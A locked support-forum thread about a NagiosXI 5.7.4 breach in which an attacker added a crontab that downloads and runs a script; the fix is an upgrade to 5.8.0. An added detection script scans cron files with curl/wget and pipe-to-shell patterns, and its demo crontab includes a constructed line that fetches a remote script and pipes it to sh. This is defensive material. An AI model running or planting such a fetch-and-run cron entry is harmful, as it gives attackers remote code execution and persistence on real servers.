NagiosXI is VULNERABLE

Locked
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

NagiosXI is VULNERABLE

Post by dslaughter »

I had a breach this morning that specifically targeted nagiosxi. I've managed to get some of the source of the command dropped. They got in through apache and set up a crontab to download and run their script. My nagiosxi has been taken offline. Please advise what to do next?
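
An added example, not part of the original post and not Nagios code: for the kind of persistence described above (a crontab that downloads and runs a script), this script lists cron entries that fetch with curl or wget and then execute the result. The function names, the directory list (typical per-user and system cron locations) and the sample entries are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag cron entries that download something and then run it.
# All sample entries are constructed; example.invalid is a placeholder host.

# Filter stdin: keep non-comment lines that call curl/wget AND either pipe
# into a shell, chain into a shell, or chmod the downloaded file.
flag_fetch_and_run() {
    grep -Ev '^[[:space:]]*(#|$)' |
    grep -E '(^|[^[:alnum:]_])(curl|wget)[[:space:]]' |
    grep -E '\|[[:space:]]*(ba|da|z)?sh([[:space:]]|$)|(;|&&)[[:space:]]*(ba|da|z)?sh[[:space:]]|chmod[[:space:]]'
}

# Scan every regular file in the given directories and print "file: entry"
# for each hit. Returns 0 if anything was flagged, 1 otherwise.
scan_cron_dirs() {
    hits=0
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] || continue
            out=$(flag_fetch_and_run < "$f") || continue
            printf '%s\n' "$out" | while IFS= read -r line; do
                printf '%s: %s\n' "$f" "$line"
            done
            hits=1
        done
    done
    [ "$hits" -eq 1 ]
}

if [ "${1:-}" = "--scan" ]; then
    # Typical cron locations (assumed); run as root to read every user's file.
    scan_cron_dirs /var/spool/cron /var/spool/cron/crontabs /etc/cron.d ||
        echo "no download-and-run cron entries found"
else
    # Demo on a constructed crontab: only the last entry is printed.
    flag_fetch_and_run <<'EOF'
# constructed sample crontab
0 3 * * * /usr/bin/backup.sh
*/10 * * * * curl -s http://example.invalid/health -o /dev/null
*/5 * * * * curl -fsSL http://example.invalid/x.sh | sh
EOF
fi
```

A hit is a lead to review, not proof of compromise, and an empty result does not clear the host: the web server user's crontab is only one place such a job can be installed.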
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

Re: NagiosXI is VULNERABLE

Post by dslaughter »

I've captured the source but haven't posted. I thought you would like me to PM since the IP addresses it's attacking are in there.
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

Re: NagiosXI is VULNERABLE

Post by dslaughter »

I'm on 5.7.4.
dchurch
Posts: 858
Joined: Wed Oct 07, 2020 12:46 pm
Location: Yo mama

Re: NagiosXI is VULNERABLE

Post by dchurch »

I'd advise you to open a ticket so we can escalate this issue.

You'd save some time getting this resolved if, when you create a ticket, you attach a System Profile zip to the ticket right away. Get one by going to Admin (top menu) => System Profile (in the left menu), then clicking the blue button. If you're unable to generate the profile through the web interface, please try generating it from the command line by running these commands as root:

Code:

rm -rf /usr/local/nagiosxi/var/components/profile*
/usr/local/nagiosxi/scripts/components/getprofile.sh SUPPORT

The profile will be output to the /usr/local/nagiosxi/var/components/profile.zip file.
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

Re: NagiosXI is VULNERABLE

Post by dslaughter »

This is fixed in 5.8.0. I've upgraded and should be ok. You can lock this thread.
scottwilkerson
DevOps Engineer
Posts: 19396
Joined: Tue Nov 15, 2011 3:11 pm
Location: Nagios Enterprises

Re: NagiosXI is VULNERABLE

Post by scottwilkerson »

dslaughter wrote: This is fixed in 5.8.0. I've upgraded and should be ok. You can lock this thread.
Locking thread
Former Nagios employee